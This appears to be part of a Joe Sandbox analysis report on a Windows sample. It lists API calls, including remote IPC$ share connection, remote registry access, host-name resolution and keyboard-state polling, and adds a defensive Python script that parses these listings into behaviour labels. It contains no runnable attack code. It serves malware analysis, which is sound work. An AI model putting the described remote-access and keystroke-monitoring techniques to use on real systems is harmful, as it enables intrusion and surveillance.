                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3125838495-3381328864
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2286883814-4206948668
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
• _wcscpy.LIBCMT ref: 00475F18
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
• API String ID: 3052893215-4176887700
• Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
• Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
• Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
• Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
APIs
• StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• CoTaskMemFree.OLE32(?,00000000), ref: 00458335
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
• RegQueryValueExW.ADVAPI32 ref: 00458381
• CLSIDFromString.OLE32(00000000,?), ref: 004583AF
• RegQueryValueExW.ADVAPI32 ref: 004583E8
• LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
  • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
• RegCloseKey.ADVAPI32(?), ref: 004584BA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
• String ID: Version$\TypeLib$interface\
• API String ID: 656856066-939221531
• Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
• Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
• Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
• Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
• __swprintf.LIBCMT ref: 0045E6EE
• _printf.LIBCMT ref: 0045E7A9
• _printf.LIBCMT ref: 0045E7D2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: LoadString_printf$__swprintf_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 3590180749-2354261254
• Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
• Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
• Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
• Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _memset.LIBCMT ref: 00458194
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2255324689-22481851
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
APIs
• RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
• RegCloseKey.ADVAPI32(?), ref: 00458615
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
• __wcsicoll.LIBCMT ref: 004585D6
• IIDFromString.OLE32(?,?,?,?), ref: 004585EB
• RegCloseKey.ADVAPI32(?), ref: 004585F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
• String ID: ($interface$interface\
• API String ID: 2231185022-3327702407
• Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
• Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
• Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
• Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
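Reading the three API listings on this part of the page together: the function at 004581D6 maps a network drive to a remote `\IPC$` share (WNetAddConnection2W), attaches to that host's HKEY_LOCAL_MACHINE (RegConnectRegistryW with hive handle 80000002), reads `SOFTWARE\Classes\<name>\CLSID` and converts the result with CLSIDFromString, i.e. it resolves a ProgID to a CLSID on a remote machine; the function at 00458513 enumerates HKEY_CLASSES_ROOT\interface (hive handle 80000000, access mask 00020019 = KEY_READ), compares each subkey's default value case-insensitively (__wcsicoll) and turns the matching key name into an IID (IIDFromString); the function at 004365A5 initialises Winsock 1.1 and resolves the local host name to a dotted-quad string (gethostname, gethostbyname, inet_ntoa). The `Line %d (File "%s"):` / `^ ERROR` format string in the preceding String ID is the layout of the AutoIt3 runtime error dialog, which is an analyst's inference and not something this report states. The following script is an added example written for this page, not Joe Sandbox code: it parses these `• Name.Module(args), ref: ADDR` lines into structured records, decodes the registry hive handles and access masks, and tags each function with a behaviour label. The line format, the `APIs` header as block separator, and the behaviour labels are my assumptions; the hive and KEY_* constants are the documented Win32 values. The sample input is constructed from the three listings on this page.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox report and map each
function's call set to a coarse behaviour label. Added example, not Joe Sandbox
code; it assumes only the line format visible on the page ('• Name.Module(args),
ref: ADDR', optionally prefixed by 'Part of subcall function ADDR:') and that a
new listing starts at each 'APIs' header. Hive and KEY_* values are Win32's."""
import re
from dataclasses import dataclass

API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:(?P<sub>Part of subcall function) [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
BEHAVIOURS = {  # call sets that together characterise a function; labels are mine
    "remote_registry_progid_lookup": {"WNetAddConnection2W", "RegConnectRegistryW",
                                      "RegOpenKeyExW", "RegQueryValueExW", "CLSIDFromString"},
    "hkcr_interface_enumeration": {"RegOpenKeyExW", "RegEnumKeyExW",
                                   "RegQueryValueExW", "IIDFromString"},
    "local_ip_resolution": {"WSAStartup", "gethostname", "gethostbyname", "inet_ntoa"},
}

@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int       # address of the call site
    subcall: bool  # reported from a callee rather than from this function

def parse_report(text):
    """Return one list of ApiCall per 'APIs' listing, in page order."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = API_RE.match(line)
        if m is None or current is None:
            continue  # header, hash, memory-dump or similarity line
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        current.append(ApiCall(m["name"], m["module"], args,
                               int(m["ref"], 16), m["sub"] is not None))
    return functions

def decode(table, arg):
    """Map a hex argument to its symbolic name; '?' and unknown values pass through."""
    try:
        return table.get(int(arg, 16), arg)
    except ValueError:
        return arg

def registry_opens(calls):
    """(hive, subkey, access) for every RegOpenKeyExW whose arguments were recovered."""
    return [(decode(HIVES, c.args[0]), c.args[1], decode(ACCESS, c.args[3]))
            for c in calls if c.name == "RegOpenKeyExW" and len(c.args) >= 4]

def match_behaviours(calls):
    names = {c.name for c in calls}
    return sorted(label for label, need in BEHAVIOURS.items() if need <= names)

# Constructed input: the three listings on this page, copied line for line.
SAMPLE = r"""APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _memset.LIBCMT ref: 00458194
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
• RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
• CLSIDFromString.OLE32(00000000,?), ref: 00458279
• RegCloseKey.ADVAPI32(00000000), ref: 0045828F
• RegCloseKey.ADVAPI32(00000000), ref: 00458296
APIs
• RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
• RegCloseKey.ADVAPI32(?), ref: 00458615
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
• __wcsicoll.LIBCMT ref: 004585D6
• IIDFromString.OLE32(?,?,?,?), ref: 004585EB
• RegCloseKey.ADVAPI32(?), ref: 004585F8
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 004365A5
• gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
• gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
• _wcscpy.LIBCMT ref: 004365F5
• WSACleanup.WSOCK32 ref: 004365FD
• inet_ntoa.WSOCK32(00000100,?), ref: 00436624
• _strcat.LIBCMT ref: 0043662F
• _wcscpy.LIBCMT ref: 00436644
• WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
• _wcscpy.LIBCMT ref: 00436666
"""

if __name__ == "__main__":
    for calls in parse_report(SAMPLE):
        first = min(c.ref for c in calls if not c.subcall)
        print(f"{first:08X} {match_behaviours(calls)} {registry_opens(calls)}")
```

Matching is done on the set of API names rather than on their order because the report lists calls by address and interleaves `Part of subcall function` lines from callees, so an ordered signature would be brittle; arguments shown as `?` were not recovered by the sandbox and are passed through unchanged rather than guessed. Running the script over a whole exported report gives one line per function with the decoded hive and access mask, which is usually enough to find the remote-registry and host-enumeration routines without opening the disassembly.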
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                                                                                                                                                                                                                                                                                                                                • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004365F5
                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                                                                                                                                                                                                                                                                                                                                • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                                                                                                                                                                                                                                                                                                                                • _strcat.LIBCMT ref: 0043662F
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00436644
                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00436666
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2691793716-3771769585
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
• __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
  • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
• GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
• __lock.LIBCMT ref: 00416B8A
• InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
• __lock.LIBCMT ref: 00416BAB
• ___addlocaleref.LIBCMT ref: 00416BC9
Similarity
• API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
• String ID: DecodePointer$EncodePointer$KERNEL32.DLL
• API String ID: 1028249917-2843748187
APIs
• SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
• SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
• CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
• SendMessageW.USER32(?,00000402,?), ref: 0044941C
• SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
